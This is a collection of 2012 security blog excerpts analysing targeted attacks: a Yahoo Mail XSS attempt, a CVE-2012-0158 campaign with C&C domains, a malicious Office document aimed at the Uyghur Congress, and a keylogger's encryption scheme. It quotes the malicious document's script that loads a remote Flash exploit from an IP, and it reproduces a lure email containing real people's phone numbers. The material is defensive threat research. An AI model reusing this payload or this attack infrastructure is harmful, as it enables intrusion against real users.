Posted: 18 May 2012 | 3:55 am
Recently, Trend Micro researchers encountered a potential vulnerability that affected users of Yahoo! Mail. We discovered several emails used in targeted attacks that contained JavaScript in the “From” field that attempted to launch a Document Object Model (DOM)-based cross-site scripting attack against the recipients of the email. However, we were not able to replicate the attack successfully. We have been in touch with Yahoo! about this problem.They, too, were unable to replicate this attack successfully at that time. However, to protect users against any such problems Yahoo! has strengthened their filters that sanitize user emails in order to protect against these kinds of attacks.
This is not the first time that vulnerabilities have been found in popular webmail providers. We discussed almost a year ago that some of the major webmail providers – Gmail, Hotmail, and Yahoo! Mail – were all found to have some sort of vulnerability that compromised either the user’s email account or their system. It shouldn’t be a surprise that they’ve become targets as well: just about everyone uses these free services, and users don’t expect these services to have security problems of their own.
As we’ve highlighted before, vulnerabilities like these are used in targeted attacks. Whether it’s vulnerabilities in user software or cloud-based services like free webmail, vulnerabilities allow attackers to compromise systems without the target being aware that anything has happened. This is extremely useful to attackers as the content compromised email accounts can be stolen by attackers and the account can be used to launch further attacks against the victim’s contacts.
Post from: TrendLabs | Malware Blog - by Trend Micro
Cloud-based Services Vulnerabilities Also Used in Targeted Attacks
Posted: 18 May 2012 | 3:50 am
Atlassian has warned of a critical security flaw in its Confluence product.…
Posted: 17 May 2012 | 11:50 pm
Posted: 16 May 2012 | 11:58 am
Those who attempt to predict the future run the risk of being wrong. But those who overlook the importance of conducting a prospective analysis adopt a passive attitude that weakens them against the dictatorship of events. Anticipating societal changes prepares us to weather the storm.
That quote comes from the recently published Prospective Analysis on Trends in Cybercrime from 2011 to 2020, by the French General of the Army, Marc Watin-Augouard.
This study was originally published in French by a panel of experts from the public and private sectors. I was one of them.
Our approach was based on the Delphi method, an iterative process of discussion based on a questionnaire developed by a scientific committee, with interim summaries drawn up by an ad-hoc committee. The paperless discussion method was effective and kept participant responses anonymous, which leveled the playing field. The 22 experts who contributed to this study underwent three rounds of individual interviews, allowing them to express their opinions and reformulate their responses based on the results of the group discussions. Their analyses and individual expertise have led to a blank document that outlines typical criminal trends of the 21st century. The process took one year to present the results in this summary.
The result of this work is not an end in itself, but rather a tool to encourage discussion among policy makers, business leaders, and representatives of civil society regarding strategies to maintain the best possible control in a digital world without borders.
McAfee has translated of the results of this new French study on computer-related crime. McAfee, and I, consider this methodical and original research invaluable in explaining the threats we face today and predicting what we might see in the years up to 2020. Armed with this expertise, we can more effectively protect ourselves against future cybercrime.
The English version of the document is available here.
Posted: 16 May 2012 | 11:05 am
On 16/05/12 At 12:59 PM
Posted: 16 May 2012 | 3:05 am
Posted: 15 May 2012 | 2:12 am
CVE-2012-0158 vulnerability has been one of the main players in the information security scene during the last weeks. Since it was seen in the wild for the first time, attackers have been using it to break the security of specific targets.
We have been tracking one of these campaigns against one of the main steel industry corporations based in Japan. We will see how the attackers have been testing the exploits, starting the attack, and then improving it. All this just in a couple of days.
Since we can’t exactly determine where the attack comes from, we will see some evidences that could lead us to some conclusions.
One of the first samples found in the wild linked to this campaign is a specially crafted Microsoft Office file that uses CVE-2012-0158 to execute a malicious payload, then showing an embedded harmless MS Office file to the victim. All the other documents are very similar, but the payloads and the harmless documents are different each time.
The way to infect the targets is sending emails to specific key people in the organization.
Some of the harmless documents showed after exploitation are related to industrial products:
In this first sample the malicious dropped payload, named 0412test.exe, is a Microsoft Notepad binary from Windows XP Service Pack 2, Chinese Edition. This suggests that the attackers were doing the first tests in his own infrastructure to build the attack.
The next samples include malicious payloads that connect to a Command & Control server managed by the attackers, which is always the same IP. At this moment all the domains found point to 210.175.53.122, an IP address located in Japan.
The second sample found drops a Trojan Horse that connects to the C&C showing another Office document to the victim. This sample has a very reduced functionality. One interesting fact is the high antivirus detection ratio (23/42).
The main feature of the next sample found is the antivirus detection ratio. Less than half than the previous one the day of the discovery (only 11/42). Now it has changed a bit.
Finally, we found a sample with much more capabilities that the previous ones. It is more focused on stealing user credentials and retrieve internal information from the affected systems. It reads saved login credentials from Mozilla Firefox browser and hooks some Windows user inputs to collect information.
It also has two internal IP ranges (192.168.20.1-62, 10.18.104.88-245) hard-coded in the source code.
The antivirus detection ratio has decreased. The day of the discovery only 6/42 antivirus detected the threat. At the time of writing it is detected by five more.
Each sample connects to one of the following domains, like we previously mentioned, all are pointing to the same IP.
touber.lagga.net
nasa.yorli.net
munite.vazuki.com
unbye.sqehom.com
tprovty.igekng.com
ernet.afywis.com
oeoe.yetrap.com
lence.kovmir.com
We will probably see more attacks as part of this campaign, with more advanced payloads. We’ve added the C&C IP address to our IP Reputation Database, and we will monitor these C&C servers to detect new threats coming from them.
Posted: 14 May 2012 | 6:54 am
There are already quite a few samples of this recently patched exploit in the wild, including those targeting USA companies. This particular sample is targeting Uyghur Congress, which is "an international organization aspiring to represent .. exiled Uyghur (Turkish ethnic group) people both inside and outside of the Xinjiang Autonomous Region of the People's Republic of China." ~ Wikipedia. The text of the email cannot be translated with online translators, but judging by the content of the attachment, it is meant to look like an invitation for the World Uyghur Assembly .
Download 1750A38A44151493B675538A1AC2070B (email me if you need the password)
主题: Norwegiyedin Toygha teklip qilinidighanlarning tizimligi
日期: Fri, 27 Apr 2012 11:46:02 +0800
收件人 XXXXXX
Salam
Xanim tönugun manga, Norwegiye rafto jemiyitidin Arne we ayalini Yapuniyede echilidighan qurultaygha teklip qilishimiz heqqide Dolqun bilen korushushumni we Dolqunning derhal ulargha teklipname ewetishini digenti. Bugun men Dolqun bilen bu toghrida korushtum. Dolqun, "teklipnamining nusxisini Zubeyrege ewetip bergen, uning ustige teklipnamege beribir Xanim qol qoyushi kerek bolghandikin, Amrekidinla ewetilgini yaxshi" deydu. Shunga ularning isim-familisini sizge ewettim. (sizde bar bolishi kerek, shundaq bolsimu ehtiyat yustidin)
Therese Jebsen
Executive Director of the Rafto Foundation
Phone: +47 55 21 09 31
Mobile: +47 41 51 13 90
E-mail: therese.jebsen(a)rafto.no
Arne Liljedahl Lynngård
Rfto fondi jemitining sabiq bashlighi,(hazir ezasi)
Telefon: 55 24 42 02
Mobiltelefon : 95 15 22 90
Ascii Strings:Dropped file (I don't have this one)
---------------------------------------------------------------------------
frame1
_&Operated by DoSWF:http://www.doswf.com <<DoSWF - Flash Encryption
Object
EventDispatcher
flash.events
DisplayObject
flash.display
InteractiveObject
DisplayObjectContainer
Sprite
MovieClip
_doswf_package.LoadingBarBase
Security
The included zip contains the second stage swf that is embedded in the main one,and a copy of the decompiled script from it. The script originally had all thefunctions and variables set to unicode strings, which have been renamedfor readability. The parameters passed into the top level swf from the doc fileinfo=789c333230d13331d53337d633b3b4 32313106001afa0338
infosize=00FC0000info is the compressed host name, infosize is a variable used to configure theshellcode and probably the offset in the parent doc file of the embedded exe.Complete script contained in the doc file below..eval(document.write(unescape('%3Cembed%20src%3Dhttp://204. 45.73.69/essais.swf?info= 789c333230d13331d53337d633b3b4 32313106001af
a0338&infosize=00FC0000%3E%3C/embed%3E')))
File: embedded.swf Virustotal
Size: 6246
MD5: 847A9CFF5328F85015293BAD2F164F10
Posted: 10 May 2012 | 5:36 am
In this release, I’ve made a couple of bug fixes. I’m also using a traditional installer which should help the folks who are having trouble registering the OCXs. I tested this out on Windows XP 32-bit and Windows 7 32-bit and 64-bit without issue. Hopefully you won’t have issues too.
MD5: 76EE13D6B9A6BD5E505AC5CB7E98F73B
Download: http://www.mediafire.com/?kdb1enez1og2b85
Posted: 10 May 2012 | 12:14 am
Posted: 13 Apr 2012 | 7:16 am
Today I will take a quick look at a keystroke logger whose unpacked version has a much lower detection rate on VT then its UPX packed version, and which uses RC4 encryption and Base64 encoding with a custom alphabet.
We picked up this file recently while observing some APT activity on a victim’s network, and this is yet another tool in these actors’ arsenal.
This keystroke logger does not have the ability to communicate over the wire, so if you find it in your environment your should look for other Trojans that would give the actors access to your network.
The characteristics of this file are shown below:
File Name: BRKBL.exe File Size: 6144 bytes MD5: 8a4bdb85acdfbf77ccadc3415d848bd7 SHA1: aa45d3596f00042eb2f0cd5a78d7666b3034f63d PE Time: 0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC] PEID Sig: UPX 2.90 (LZMA) VT: 9/43 on 2011-11-07 15:32:12 UTC VT: 15/43 on 2012-29-02 16:44:27 UTC
Interestingly, the unpacked version of this file has a lower detection rate as of today:
File Name: BRKBL-unpacked.exe File Size: 8192 bytes MD5: ebdc4d363da8b97ab65df9bf921e1b56 SHA1: c9754d84d9a2c925c0271ad36e572858637fa1cc PE Time: 0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC] VT: 3/43 on 2012-02-29 15:16:00 UTC
This keystroke logger logs the data in a file named C:\DOCUME~1\username\LOCALS~1\Temp\ade######.Tmp, where ###### is the YYMMDD of when the file is created.
The entrenchment location is: SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
The captured window titles along with any keystrokes are first RC4 encrypted using this 128-bit key (0×02000008000302060001090801000702):
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 02 00 00 08 00 03 02 06 00 01 09 08 01 00 07 02
In case you have never seen what the RC4 algorithm looks like in assembly, here is a peak at the building of the 256 byte table (0×00 – 0xFF) and the loop that mixes in the key:
Encrypting the data with RC4 is the easy part of the obfuscation employed by this Keystroke logger.
The RC4 encrypted data is then Base64 encoded using a custom alphabet. Typically, the custom alphabet is sitting somewhere within the binary file, so it would be easy to test out (e.x. look at http://www.cyberesi.com/2011/11/02/trojan-prime/).
In this keystroke logger the custom alphabet is implemented in logic and is thus not visible. So, I will share with you a little trick that I use to let the Trojan/Keylogger tell me what the alphabet is.
In order to determine the custom alphabet you first need to find the subroutine that will encode the data. The easiest thing to do (at least the first thing I try) to find the subroutine is to put a hardware breakpoint at the first byte of your plain text. In this case, this hardware breakpoint would have landed you at the RC4 encryption algorithm. Next, you put a hardware break point at the first byte of the RC4 encrypted data, which will land you somewhere in the middle of the subroutine that does the Base64 encoding. In this case, the beginning of the subroutine is at address 0×00401080.
Next, if you look at the argument passed to this subroutine you will see that among other things are:
1. A pointer to where the RC4 encrypted data is located. 2. The length of the encrypted data (change this to 0x30) 3. A pointer to an output buffer (where the encoded data will end up).
The way to trick the keystroke logger (or any other Trojan for that matter) to give us the custom alphabet is to replace the RC4 encrypted data with this raw data:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 00 10 83 10 51 87 20 92 8B 30 D3 8F 41 14 93 51 ƒ Q‡ ’‹0Ó A “Q 00000010 55 97 61 96 9B 71 D7 9F 82 18 A3 92 59 A7 A2 9A U—a–›qן‚ £’Y§¢š 00000020 AB B2 DB AF C3 1C B3 D3 5D B7 E3 9E BB F3 DF BF «²Û¯Ã ³Ó]·ãž»óß¿
Where did this data come from, you may be wondering? Well, this data is what you get when you decode the standard Base64 alphabet itself (shown below):
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
And obviously, if you were to Base64 encode the raw data back, you would get the standard alphabet back.
Understanding precisely why this data will give us the custom alphabet requires a good understanding of the Base64 algorithm. However, the basic idea is that this data is special, in that when the encoding algorithm is performed on it, it produces index values 0 through 63 in order, thus forcing the Trojan to map the index values to its custom alphabet letters in order. As I said, this trick will work on any Trojan that uses the Base64.
So, once you pass this data to the algorithm you will find the custom alphabet on the output buffer. This Trojan uses this custom alphabet to Base64 encode the RC4 encrypted data:
16BGLQVafkpuz27CHMRWbglqv-38DINSXchmrw/49EJOTYdinsx0FKPUZejoty5A
Here are the strings of this Trojan (from the unpacked version):
Text strings referenced in BRKBL:.text Address Disassembly Text string 004012AA PUSH BRKBL.00403720 ASCII "Windows Title: %s" 00401450 PUSH BRKBL.00403740 ASCII "%s <Buffer Full>" 00401475 PUSH BRKBL.00403734 ASCII "%s<Enter>" 00401584 PUSH BRKBL.00403760 ASCII "%s\ade%02d%02d%02d.Tmp" 004015B5 PUSH BRKBL.0040375C ASCII "%s" 00401618 PUSH BRKBL.00403758 ASCII "a+" 00401630 PUSH BRKBL.00403754 ASCII "%s|" 004016A8 PUSH BRKBL.00403780 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 004016D4 PUSH BRKBL.00403778 ASCII "UPDATA" 00401A16 BRKBL.<ModuleEntryPoint> PUSH EBP (Initial CPU selection) 00401B8B PUSH 10000 UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
Posted: 29 Feb 2012 | 11:56 am